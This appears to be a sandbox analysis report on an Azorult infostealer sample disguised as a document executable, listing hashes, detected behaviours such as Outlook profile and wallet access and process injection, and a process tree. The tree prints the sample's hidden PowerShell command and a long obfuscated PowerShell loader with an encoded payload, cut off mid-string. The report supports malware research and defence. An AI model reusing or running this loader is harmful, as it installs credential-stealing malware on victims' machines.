Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
26-11-2023 22:43
Static task
static1
Behavioral task
behavioral1
Sample
Document-HT1P9915900.exe
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
Document-HT1P9915900.exe
Resource
win10v2004-20231020-en
General
-
Target
Document-HT1P9915900.exe
-
Size
722KB
-
MD5
e7d8ea8f7edeab9c00e6916db9cddf6d
-
SHA1
5f6900b970ae01fe9cacd3c054bb6fac4ccd113c
-
SHA256
ffe63aecb926ed305039dda5b7102cdfa7bb826126dc0b178e700d7782441579
-
SHA512
1473a995616f289481fc7bf364a5b097c15eb2890c570d3c58b564cbb1f3457320c89f9f816ab96dfb7adc73a769672b9adad81b4bc3362905914694c377fd5b
-
SSDEEP
12288:GcqMWxQR0RULXAhXmv58VA4mM5ryp+DDokyE779mrgBvrw:Gn+RMSAhXoG1cp+DDkE779mIE
Malware Config
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Loads dropped DLL 17 IoCs
Processes:
Document-HT1P9915900.exewab.exepid process 1692 Document-HT1P9915900.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe 2708 wab.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
Document-HT1P9915900.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Flskesvrenes.ini Document-HT1P9915900.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2708 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2644 powershell.exe 2708 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2644 set thread context of 2708 2644 powershell.exe wab.exe -
Drops file in Windows directory 1 IoCs
Processes:
Document-HT1P9915900.exedescription ioc process File opened for modification C:\Windows\resources\samfundsbevarendes.ini Document-HT1P9915900.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wab.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wab.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1428 timeout.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 1440 powershell.exe 2644 powershell.exe 2708 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2644 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 2644 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
Document-HT1P9915900.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 1692 wrote to memory of 1440 1692 Document-HT1P9915900.exe powershell.exe PID 1692 wrote to memory of 1440 1692 Document-HT1P9915900.exe powershell.exe PID 1692 wrote to memory of 1440 1692 Document-HT1P9915900.exe powershell.exe PID 1692 wrote to memory of 1440 1692 Document-HT1P9915900.exe powershell.exe PID 1440 wrote to memory of 2644 1440 powershell.exe powershell.exe PID 1440 wrote to memory of 2644 1440 powershell.exe powershell.exe PID 1440 wrote to memory of 2644 1440 powershell.exe powershell.exe PID 1440 wrote to memory of 2644 1440 powershell.exe powershell.exe PID 2644 wrote to memory of 2708 2644 powershell.exe wab.exe PID 2644 wrote to memory of 2708 2644 powershell.exe wab.exe PID 2644 wrote to memory of 2708 2644 powershell.exe wab.exe PID 2644 wrote to memory of 2708 2644 powershell.exe wab.exe PID 2644 wrote to memory of 2708 2644 powershell.exe wab.exe PID 2644 wrote to memory of 2708 2644 powershell.exe wab.exe PID 2708 wrote to memory of 1148 2708 wab.exe cmd.exe PID 2708 wrote to memory of 1148 2708 wab.exe cmd.exe PID 2708 wrote to memory of 1148 2708 wab.exe cmd.exe PID 2708 wrote to memory of 1148 2708 wab.exe cmd.exe PID 1148 wrote to memory of 1428 1148 cmd.exe timeout.exe PID 1148 wrote to memory of 1428 1148 cmd.exe timeout.exe PID 1148 wrote to memory of 1428 1148 cmd.exe timeout.exe PID 1148 wrote to memory of 1428 1148 cmd.exe timeout.exe -
outlook_office_path 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
outlook_win_path 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Document-HT1P9915900.exe"C:\Users\Admin\AppData\Local\Temp\Document-HT1P9915900.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden $d = Get-Content 'C:\Users\Admin\AppData\Roaming\plimsol\borgerligst\Vivificator\Raffineringen\Soreheadedly.Bob' ; powershell.exe ''$d''2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Metopons Totalfredningers Klar Spadseredragternes Lisbets Bredsaaninger #>$Amoebocyte = """Ge;NaFBruDonLec DtTiiUdoRenSl KBKlr ToSld Ee PrCleGrd FeOusCl0Co4Gr Pr{In Ul Re Ve UdpBaa KrMaaFim U(Si[NeSEltJarSei PnSugPo]Ph`$EuM Gy dn IhSeeTreSarTe)In; S Lo sk Fo aa`$UdUSanQulTeaEptSpcRehTh v=Ca ApNIleLiwOp- AOSpbLojSueSkcAftTr GrbCoyAftOpe p[Fr]Da Ba( G`$EnMGyyEnnrehSteLyeisrLa.StLSoeCanNagmatPehAv Sr/Ho Ch2 N) S;Er Co mi eg pFnooGer i(Fl`$ OSUdaSil FtEriKreFerKarMyaDi= S0 D; B bl`$MeSCoarolEqtBiiVaeGtrNor NaTa Ra-Gll DtSc Ri`$ SMUnyBlnFahGaenieBerAf.LyLCoeUnnAsgPhtVahTi;Bl Hu`$TuSPeaMolIntUdiDieDkrDirSlaDi+ F= O2St)He{Oy I Du U H Kv Ud Bo br`$TeUstnValamaMitcacDihPi[Co`$ShSUnaGll HtpuiPrenarPlrHnaCo/us2Te]so Co=Un Fe[Kucouo VnHvvPrePlrBatIn]Ch:Se: rTAuoNiBMoyBotKre T( P`$nuMPly cnTuhTmePyeHar C. NSUtuCobPas Ot CrSeiSpnBrgSi(Va`$BuS PaKelVgtFli BeSnr Pr Aael, P Re2 L)Co,De ku1 F6ur)mi;Da ad Im`$MaU Un UlKaa KtUncUnhRi[ w`$InS SaTulWhtSliEne DrPlrTia M/Wr2 M]Re Th=Ov AlABirSvcoeh KoPerFur DhVae FaMa5Ve F`$PiUDinCil PagltFrcExhEm[Br`$PrSClaNalCrtEciMeeInrRirStaSa/ P2 C] u Se2Ba4Ve;mi Un Su Di un}in He[StSRetPhrCiiCon SgEk]St[RhSFayInsGetcheunmOp.StTPseChxRetPa.reEUnnTicInoPrdfii onfigSk] U: O:DiA ESEsC EI MItr.ulGAlebatCoSLut VrStiPrn KgTa(Nu`$UpUFrnMilReaDrtMacLihUd)Tr;Th} U`$CiGGea plPrmShyUngUd0St=KoBNar FoVodSte DrRieMudCee VsTo0co4 B Ph'Ce4ViB A6tr1Zo6MeBLa6TmCMo7VaDSp7To5Gr3Mi6De7WoCJe7Ud4 T7Rn4pa'Du;No`$AnG TaAel bmRdy FgGu1Ep=SaBinrCro MdDeeKorPreLudPoeClsDa0 M4Bo De' T5 S5Me7Su1Te7PhBCe6MyAFo7Ar7Re6UnBMi7Ru7Hu7PrEPr6brCCy3Au6 S4 SF B7An1Ai7Ew6Fo2chB S2UhANo3Me6 R4BrDNo7Kr6Ar6 MBSa7Co9Ig7brERe7GeDDe5 S6 B7Ha9Je6TuCfi7Co1 T6 KESn7PrDAn5Ba5 D7 ODKb6SeCSl7Pl0Pr7Le7Do7 TCHu6BrBVo'Af;wh`$HaG FaPilDrmFiySngKo2 T=GrB Mr Tosed UeDirBaeSedUneSpsTe0Fa4Ta Ro' S5StF B7UoDSk6SkCKr4Un8Gr6AnA C7Bl7no7IaBUp5Su9Cl7KaCOs7DkC F6FoAHj7BuDAn6OvBAl6TeBHi'Sk;fo`$ AGSoa PlSkmLay PgBe3Rv=UlBSpr AoFidPoeInrMeeFedDoeHosNo0Pe4Fa He' P4PaBRe6 A1sm6UoBBa6UnC S7 CDVe7 D5Im3li6No4 PAan6CeDPe7Ba6 A6HyCAp7He1Pr7 K5Ro7OaDCo3Li6 d5us1Pr7th6 B6ToCPr7KrDTa6 BARe7 M7Cr6Th8Su4MoBFe7AmDUd6MoACo6foEJe7Hd1Un7RhBTa7KaD C6WoBHe3 D6Un5 S0 S7Cl9St7 B6 S7MoCAn7 a4Qu7PiDUn4 KA U7 YD K7CaEUn'ud; D`$TaGFoaTilEgm UyChgUn4As=AgBFirUno DdGyePrr SeErdUdePrsFl0Ku4ud Im'Un6FoBDr6NoC L6KaADi7No1Li7Sp6Ca7laFTr'Sa;Wi`$ImGFoaStlHymAlyPrgAd5Be=BeBGtrPooIndToeMarheeDadEleHosFy0Ti4Pr Sj'Ty5amF L7InD F6SpCMr5Ku5Se7sj7 B7OpCUn6BaDOv7Fo4Su7 FDSt5sk0 M7Sa9Mi7Zo6 S7OpCIn7Br4Gl7FlD E'Di;Po`$atG FaEnl TmMeyGugDe6 S=gaBImrReoOpdDaeAbrSeeVedDreEusSa0Ki4Ci St'Ra4BlA A4PlCSe4 TBDo6St8Ko7frDDo7AfB L7Ra1Pe7Ud9Pu7Sp4so5Sa6Be7In9Ex7 F5 L7ReDTr3To4An3Kr8ni5 S0An7Ob1 O7 MCac7LoDBr5giA s6St1 P4UnBGa7Ch1Pr7IsFTo3me4ci3My8 T4Sl8 D6 CDIn7abAFa7Be4 R7 P1La7AcBSe' S; S`$ MGGpaTal BmNayVagLa7Ki=NeBPrrtyoGedBoeDarTueShdPreSns F0Ho4Me Ti'Ba4BoADe6 BDSj7Ti6Na6miC C7Ca1Di7 I5Hu7ToDTy3Da4De3 S8 M5Hn5Re7Bo9 S7Ma6An7Be9op7HaFSk7MeD p7GoCSa'Wh;Pr`$AsGYpaSolGumJoyLug U8To= dBDerMuoFld newirSke RdLieImsSu0Bo4Fn Re'Ge4FaAem7AfDFi7FuEge7Di4Su7SlDKo7TaBIn6FiCSe7BeDDe7TiCop5PrCCr7 SDKa7En4Ka7HyDCo7ReF E7Ap9Go6BoCli7InDka'Fo; T`$BeGSpaInlFom LyCagEi9Ne=InB MrImoDrdSaeAcrbaeBrdine Mscy0Af4Mo My'Fi5My1Kw7Co6La5St5To7HyD p7Ne5 O7Un7An6SaA F6Ca1Di5Ro5Sr7Ca7Re7MeCEp6fiDHe7Ma4Im7reDUn' A;Ko`$GesDav FaepjSmeLotSesUp0Sk= OBlirDaoBedAneAcrBeeModQie AsUn0Sa4Fe Sa' H5Ed5Mi6ho1En5trCCe7FaDRo7Sa4Et7UtDFn7KaF R7De9Sa6EcC T7MiDSk4VeCYn6 V1Op6 S8Ov7TrD F'Wh;Fo`$nosBiv MaGejDeeDitVisTa1Ho=StBVar Soudd QeAtrCaeLyd teNosDr0Ab4 S Am'Sk5NeBSk7La4Ra7Ha9Br6TaBFo6MiBVa3 T4Fy3So8Sv4Ge8Un6OvD U7IsAHa7Ab4Hm7tr1Na7AmB F3Un4Ma3Co8Un4YeBZi7XaD U7Hn9Sa7Aa4Ru7AtDSk7 BCli3Bi4 S3bo8Qu5Ve9Rs7Pa6 A6QeB A7 P1Bi5 KBBo7St4Ma7Bo9Ki6KaB U6NoBOv3ra4 S3 A8Un5Ge9Sv6HvDSc6KaCBl7Da7Ep5CiBMa7Mu4 R7 L9Pu6TiBSo6HaBMo'Li;Ya`$FrsTrvseaCrj Be Dt Ss C2Ny=AkB urCooSydMoe FrTeeHedPreSns r0 D4 N Ta'Do5 S1 B7By6Sp6PaEMi7 e7In7da3Ir7SwDPo' N;Di`$ asDav Sa Pj ZePotInsco3Fr=KlB VrMeoAbdheeDorEse Gd CeTasRe0Ce4Sp Ba'Ag4 O8 H6liDAf7ReA h7 t4Ot7 G1 k7LuBOv3Sb4 S3 P8Re5Pi0Ri7Se1Ch7 OC K7UnDLi5ApAMi6Pr1Un4AfBCa7 V1Ri7RaFGa3Te4Ba3 N8Fo5Ra6In7TuDSs6WeFAd4 BBGe7Af4Co7Vi7eu6NdCUs3Da4Sm3Th8Bo4buEBu7Sp1Un6InAse6CoCRe6AdDEu7Po9qu7 R4Ye' M; D`$ LsSov SaImjSmevat PsSi4Cr= UBVerSmoRadOpeMurExeRadSaeAcs K0Kr4Ed Sy'No5 PBKk6 KA S7OrDSe7Ra9Pr6SkCDi7FlDra5IsE D7 S1ve7ul4In7EnDQu5An5St7Ch9Th6 C8St6Ne8Bn7Cl1 F7La6Ob7DaFIn5 S9 S' S; D`$KosravBiaBajReemitUnsSp6ch=TrBSur EoPodSneHjrAneFidAfeLes K0 I4gg Pr'Lo5Op5Ti7Kn9Un6Co8su4SkESi7Nu1To7FaDSt6CoF B5Re7Mi7TiE i5WiESk7Ta1Gr7Fe4bi7 EDRe'Pr;En`$QusBavEnaWijFyeShtKlsMe7Ku=CaBTarPeoShdHoe TrOpeKodTreLisTo0Al4Ba or'Ek5De1Af5KaD A4 M0Ch'Au;Tr`$UdsMov paAcjAleMutLosTr8Ka=seB Vr soUndSke br FeSvdDieRgs T0Re4Pl Bi'Wh4Fu4 N'No;Sa`$prN DiDacSkksmiSoeKrbMaepanOp=AnBVor Ro AdUbeKurToe EdKreVasRe0 M4Se An'sa5VaD S7Ar6Ca6BrDLa7Ov5 P4PaASl7SuD L6JoBPa7Ly7Va6NsDKa6SkASu7AnBCo7InDRe4 BCmo6Ab1 t6Pa8Ta7auDun6 IBBa4FiFUn'At;Da`$ CLSuy hmFbp DhFooGicLayBrtDuoOrsPaiDasSa Kl=Fa SBKar AoWad FeBornoeWadGneOrsTr0Na4Dr Gl'Ly7Un3Br7KoDBo6prATi7Fr6Pr7 SD K7 P4 R2AnB F2KdAAd'Ko;SafBeuCanHecIstTaiFooFlnUl SpASkr BcAdhEtoHjrSlrErhDeeBiaUn3 T an{ IPCaaKrrNeaImm L Ry(Be`$ GKStaMaoSklPui NnSlsColIne FmMemUneHyr Hiale BrEnsBo,So Be`$AhUCodKlsFakOdaFom BmKne KdTaegrsJa) P Tr Se La Cr Pr;Un&Fr(Pi`$Ens Tv Ma Aj TeIntSmsPe7bu)Tv Sm(TeBIsrHeoCadGaeSorSpe DdPaeEms B0Sk4Pl Ud'La3 AC F4Vi8 F6KoAge7Fo7ha7An4 K7Sa9Je6en8Ma6StBNe7ReDBe3 l8No2Sv5Po3Su8Un3Os0 U4Mo3 H5Un9sa6Tj8Re6sp8De5PiCUn7Pr7Ke7Bn5 A7 J9 H7md1Be7So6Cl4Tr5Hj2 U2Ov2Tr2Ba5UnB R6 MD N6TmASk6UnAMr7HiDSk7Mi6 T6 PC C5 JCMi7Hu7Od7La5lo7Br9Di7Sp1Dy7Fl6Sn3Ra6Qu5SkF U7loDGu6EnCKr5Ap9Si6 ABAc6tyB K7UdDaf7On5 S7PoAse7Ae4Er7At1Rk7PeDEr6KaBNo3 R0Fu3 V1On3Au8Ra6Fi4St3Di8Ga4LaFMi7Mi0 D7TiD F6 RABa7SyD L3Sa5Ra5Ro7De7 WATe7py2 F7DaDRe7InBQu6PoCCh3 K8Sw6Ta3Ha3Ek8Ab3MiCAf4co7Ge3su6na5emFPi7 P4Ap7Ty7Fi7KlACh7 h9af7In4Bi5ho9 M6UnBLa6DuB A7GaD B7Kr5Bo7akADe7Ty4Hi6Co1ry5FrB T7ok9Od7GeBGi7St0Sv7UnDMi3Ca8Be3ti5Gr5Xa9Pr7 S6Ex7HyC D3 W8 P3OvCFo4 S7Re3Vk6Zy5ph4 W7Lu7Ub7NoB M7Va9Di6PrCbe7Br1So7Sy7ab7ma6Rh3As6Gi4 YBSt6Po8Kl7Fe4Ba7Ra1 D6orCBe3Bl0ma3LaCPa6 VBsc6BiEro7No9La7 B2Bl7haDAi6HjCSa6 IBBe2 S0Ru3Do1Ab4Bi3 K3Br5Ef2No9Ba4Pu5Ca3Se6Sh5InDCu6Pl9Sp6PrD Z7Xy9Fo7 I4 H6ArBPr3Sa0St3InCGo5GrF P7Vo9Le7 P4Un7Fr5Mo6 D1Ge7PeFBu2Er8Sn3So1No3Si8Fe6Re5Ju3Do1No3Pu6 U5UnFHo7SuDSk6MiCSu4 ACBo6 S1Ri6Am8Ue7arDAr3Ka0Hv3OvCEj5 IFBu7Ra9Sl7Ka4Ne7Sc5Ca6 L1Sy7AeFUn2Ud9 S3 S1Tr'Ov)Sa;Ca& F(Bo`$ DsDov RaUdjEne Dt TsJa7hu)Wr Re(InBTarPeoSudRoeTirHeeRud PeLis C0Sa4 u Di'An3DeCSe5SnB C7Da9Fo6BuDDi7GeBFo6CaD f6 GB R6DeBSp7SpDsp7LoCSp3Op8El2Ba5Ov3Ar8hy3InCMe4No8Mu6JuASi7Ca7Kv7uf4Mo7Hv9Ku6Mi8Dd6 ABWh7DiDRe3 R6Om5KuF H7PjDRl6 iCSl5Bi5Pu7 HDCo6 TC S7Ev0In7 S7Ko7PrCVe3Pa0Re3CoCDr5TvFCo7Br9Ca7 A4Bi7Do5Et6Un1 E7XeF T2HyABe3Ju4 S3in8Ra4Ce3sk4AnCAl6In1hu6Ef8Br7 ODLi4 S3ch4Fo5Jo4Fl5 B3Co8Di5pa8Al3Qu0 E3TaC M5 PFSk7Ml9Bo7Pr4Py7Dv5Op6Le1Un7GrFRe2UnBRk3Ni4He3An8Sp3 RCFo5 DFUn7 S9Sp7Ma4 S7 U5el6Bo1ny7 SFDa2 DCwa3Pa1Un3Sk1Sa'Pe)Le;St&Kr( U`$ResElvbuaHujLgeCytjasSe7Ba) S B(FdB Sr aoNidBlererErefedTaeLasMe0Me4tu E'In6KnACo7HuD d6muCFo6 BDTi6 BAGl7In6Ha3Ch8Mg3roCRu5ViBCo7No9De6piD W7ReB F6BiD H6coBPr6BrBRa7toDGr7VaCMa3Ri6 B5Ab1Pl7Et6Cr6EnECh7Di7 M7Kl3Pa7hyDFl3Pr0Le3UnC R7 O6 T6ArDDa7To4Va7Re4Ge3Ro4De3 m8Sc5Ta8In3In0 P4 N3Ca4EnBMa6 B1 F6BoBPr6noCSt7FoD P7Ra5 M3Fr6 S4DiA V6ArDPa7un6Pr6BlC B7In1 F7Wa5 T7FaDFr3 R6 O5No1Nu7Ti6 U6 tCRe7SlD N6LaAFo7Fe7Ti6sr8Br4 SBEn7 MDDi6EvABi6GrE F7aa1 D7MiBAp7LeD M6LaBFe3Vk6 S5Ud0Na7He9bo7Ar6Go7MoCNu7 H4Mu7PhDVi4RiAUn7GrDSp7UnEEd4Le5Gr3 A0Ph5 F6To7NaDNo6HaFRe3Ua5el5 M7 A7UnAUn7Am2Dy7 ED S7SkBVa6SiCAn3 L8No4LnBsp6Tu1Pl6 SB K6AtCFr7UnDLe7Wa5Ma3In6Vg4BrACo6 CDAr7Ag6or6FaCte7sa1Ph7 E5Mo7 RDBa3Va6Kr5 K1An7Ir6 S6 gCSt7 CDUg6 SA B7Pi7di6Ey8te4LuBFa7SmD Y6BaAAg6ApESt7Fr1Sc7 FBCe7 TDDy6NoBAn3Ve6Hv5 T0Ro7Pr9Jo7Do6Ch7AnC B7le4su7 UD O4 SAAf7AvDBo7OeEAm3Ct0Op3Bl0Bl5 D6So7 HDRe6SkFSk3Sc5St5Fa7 b7DeAFe7Pr2Pl7QuD L7BlBGo6JuC t3 L8Ar5Da1De7Mo6Ai6 SC F4Be8Sp6FlCPl6 OARe3De1Op3Kv4Sv3Ti8Mo3Sa0 P3TeCHj4Re8 A6tiAVa7 H7Sk7Re4 P7Ti9 H6Pr8Sl6 FBFa7DiDNy3 s6 O5 NFBr7 EDDy6QuCUn5 C5Ub7SwDAs6 TC H7In0Kr7 S7Co7SeCre3Hj0Fo3NdCVi5PrFBr7Pe9An7 S4Ou7Fu5Er6So1He7MeF B2SyDSp3Un1St3Fo1 F3Fl6 p5Au1Jo7Lm6Me6HyEBa7Pr7No7La3To7 FDSt3 F0Af3GrCOu7 P6No6 ND S7Ci4 S7Li4Eg3Re4Pe3To8Sp5in8Cy3Ph0Ak3HeCGe5ak3 B7Pr9Ka7 N7Me7 g4 S7Sl1Pr7Al6co6SvBwe7 S4mi7SkD H7Ot5To7Fu5Fo7IsDKv6MaAVa7Pa1Go7DrDPi6BlAAf6ToBTi3 B1Ae3Di1Bl3In1Fo3Pa1Ov3Di4Ru3 S8 O3AcCPa4BrDCa7BrCKo6EjBAg7Ti3To7Ma9Fa7Li5 H7te5Ov7FoDCe7BoCGu7diDul6ScBCh3Bo1Bf3Ha1Se' P)Un;Gr}SafMeuOlnjocPrt Bi UoRenje GrA CrDocPahFaoTerBrrDahAfeLaaEn2 A Fi{ HPInaLurKaamemda Ee(Ud[UnPLoaCrr RaQumNeeAnt ReOprUs(BaPPooNasKuiMitCoi OoLin P S=Ud Ch0Fi,Di DrMDeaAnnmadPaaIntinoAlrHoyek Aq=Po ta`$SrTAfrAguUneCa)Un]Le Ti[SoTUnyAup Ae I[Ud]Un]Lo Ob`$ DRpauKbn BdAsbSuo Cl OdHveFenIlsGotRgaUns FiHjaRasVe, D[AnP KaBar KaKemSeechtVeeLer K(TeP NoKosEni FtRui Eo InAc He=Di Te1An)Et]Sp M[ PTGay Hp De B]Gl D`$ApHMivFreAdp MsFleLknIs Pr=Sp Dy[FiVBroNoiDidHe]Ra)Ki; X&sy( B`$SpsMevKuaMijPreGatnis B7 m)Vi Sa(ToB Pr VoChdAne rrSjeWidTueDusAr0ce4Si Fl'Er3plCDo5buCPr7 L9Sf7afFSl6MeBGa7 P7Br6ObA T7OvCho7rv6Me7UpDMo7Ma6Se6 WBUn3So8Ig2Sv5 U3Ar8Re4ox3 H5Se9Br6bo8Lu6Kn8To5BiC W7 M7Ju7mo5Fa7pr9Sl7Ma1Fa7St6Bl4 A5Ca2Re2Mi2 B2La5InB a6 ADFi6SeAUd6prANa7 TDMo7pe6Sk6NeC U5GrCSp7Me7fa7Co5Un7Br9Ku7Un1Re7re6Na3 H6Ba5OfC b7GuDAn7FlEUs7 S1Fl7Hy6Nu7skDVe5MiCra6Ra1Qu7 L6 F7 T9 P7As5 S7 A1om7NoBTa5Fy9Pl6BjBov6WaBLa7JaDtr7Sp5ha7CiAPr7An4To6Cr1Pa3Te0 F3 H0Du5Ne6Ca7 FD B6BeF M3Af5Ug5 P7Sn7UdAfu7 D2 P7OrDGa7CeB R6SvCNo3Kr8Di4OpBWh6Re1Un6EkBOx6VaCTa7SeDPr7Mi5To3Re6 H4PrA t7CeDDe7 KEAn7Su4 I7AfDRu7InB S6GrCSp7Co1Sp7Ru7Ov7So6Li3da6 R5Gr9Ta6StBBo6KoBOb7UnDBa7El5 s7NoAPr7 R4 D6St1Pl5 M6Ra7Dr9De7In5Dv7SkD S3Fr0jo3imCse5FlFCh7 T9Vr7 G4 E7Ka5Fi6He1Ol7AdFBu2Pt0Eu3Sk1Ch3Up1Ob3da4 B3 s8Op4Un3il4 SBUn6De1Po6VaBIn6BeCAf7UnDYe7Re5Hl3In6As4AsAVr7UrDsn7SpE G7He4Cl7MnDOv7 CBUd6 BCAn7Vr1Da7Af7St7aa6Ge3Sl6sa5SaD S7Pe5Br7Rv1tr6UnC H3Rr6Br5Bh9Ar6AnBPa6 HBKa7TrDVa7Po5La7reARe7Fo4Su6 S1Pr5skADo6LuDTu7 O1By7 T4di7siCha7AsDPa6 fAPu5Ko9St7 VB s7BhBde7 TDJa6FoBOv6 dBSa4Is5Ap2Pa2Ba2Tr2Ej4VoA H6 KDkr7Tr6 P3 S1Qu3Qu6Fo5ExCAn7SkDSt7OgEKa7 H1ko7Re6 n7FoD L5HjCMa6 M1Pr7 P6Ad7Sv9Ko7 B5 T7Pr1vi7WhBSt5Ma5In7Te7Fo7GiCFl6SpDPe7Wr4Ba7LsD K3Ga0Ma3FlC S5GiFMy7At9 W7 P4Ju7In5He6Re1Sa7 TFAi2St1St3Lo4Bo3De8Un3guCwe7NoEop7 S9Ha7re4Po6ThBEs7DeDSp3Li1st3 f6Se5euCCa7crDOv7SpEin7 I1To7Ve6Pr7PoDGe4FrCAt6Pr1Dk6Un8bi7DeDJu3Li0Fo3BeCmi6FoBLo6 AEBr7Se9un7 U2Fl7EsD F6InCfe6 ABBe2St8 B3Sk4ar3So8Fu3paCGs6 CBci6OrECa7 I9 D7Re2Tr7SyDvi6 HCLa6 PBin2Qu9Ba3 K4Da3 f8on4 B3Au4KaBNo6Tr1Ky6LyBni6RoCAg7MaDTa7 u5Bl3Be6 P5Be5De6 HDSt7 Y4Te6 LCre7Ar1Ep7SuBUn7St9Me6UnBBr6DaCSp5PeCDi7UnDMa7Ko4Fi7TrD A7AaF S7Pi9ka6WoCFo7MaD J4St5Rh3Op1So'Kw)Ps;As&pl(ud`$AgsCavIna Kj leTet PsEg7Re)Sp Un(ApBGerTaoWhdReeSirseeAdd MeTas P0Au4He Fa'Sa3GiCUd5SoCZo7 K9Di7SkF L6 FB I7Ho7Be6PiAPr7ImCsv7Ld6Ch7AbDCh7Bu6Pa6heBNo3He6 K5blCAn7RyDfi7SeE F7 O1Kr7Fr6Hr7AiDAl5StB R7Re7co7Kr6di6LaBOv6 FCUn6ChAUn6 TD C7ApBAn6SnC L7 C7Wa6HaATu3pa0Tj3SpC J5 SFFa7St9Ov7Sm4 O7 B5Vi6 T1Sk7LuF c2HyEMi3Br4 B3De8 J4 S3 B4 EB P6Di1ri6RiB J6LeC T7TiDGh7De5Un3St6Ju4WhAfl7 IDBe7BoEMi7 b4St7giDAu7prBCo6 SCAn7Te1St7 G7Ko7 B6 U3 S6Sp5SkBPr7 S9Tu7om4Sn7 A4Ry7pa1 B7ou6Im7liFTr5MoBHj7Od7Fn7st6Fo6PrEGr7 CDbr7In6Ny6 MC F7Ci1Su7 L7 U7Sp6bi6 SBse4hy5Th2Ly2So2Br2Ma4MoBTu6 bC B7Ov9Cr7Ry6Ls7 MCHy7uh9Jo6amALo7FoCMa3Pe4Av3Lu8 N3boC T4ZeAGe6MaDFa7Gu6Ch7NoC I7 EAHi7 K7 I7ni4 A7UuCTh7DaDDi7In6Ma6KvBLi6GeCCo7Kr9Dy6PoB w7Un1Be7li9Re6GeBRe3Ro1Ko3 T6Ba4AlB S7ScDTo6StCDr5Ba1Sk7Un5Im6Ja8 T7Ci4Da7ScDPe7Ki5tr7FrDaf7sp6Er6PuCPa7In9Si6LaCEx7pe1Up7Be7Gt7 C6Ge5CoENu7Eb4Sp7Is9no7KeFMi6PeBPe3De0An3MiC S5UdFGl7un9Oe7Fi4Pr7Re5Sm6Ta1Ha7ExF K2BeFGu3Aw1Vr're)Po; E& O(Fo`$Ses Bv Va UjAfeTrtBrs V7Gr) H Af(TrB rrploNadSueEgrFlePidFlePysSu0Th4Fl Sj'Di3 PC U5 BCGa7 S9Co7BeFFu6SiBSo7Im7 c6OsAFo7GeCMi7Se6Im7EaDCi7 F6Fj6AmB J3gl6Aa5UnCEi7 BDRy7EnESm7 K1Si7Hy6Ag7TrDFr5Va5Fe7KoDPi6 SCRe7 P0Co7Ma7Si7NeC A3Be0 K3GeCho6StBBi6ReEAl7Re9Ov7 M2Dd7 KDLu6 PCMn6TuBAr2AdAbe3 g4Th3Ko8Bo3SpCLa6InBUn6ElEAa7Is9Su7An2Re7FoDRe6ThCAb6FaBVi2KjBOu3Sj4Co3 S8 F3ldC S5Fo0Un6HjEGr7CoDUn6Oi8Te6LoBGl7PuDPa7Ba6Pr3By4ca3 S8At3ChCDi4 SABr6LaDSt7 T6Pa7UdCOu7DaADa7 U7So7Bo4Tu7 ICPl7SnDli7Co6Br6CiBRe6WeCHu7Ap9Gt6SiBOp7Ra1 I7ne9Co6TeBBr3Gi1Af3 T6Rh4 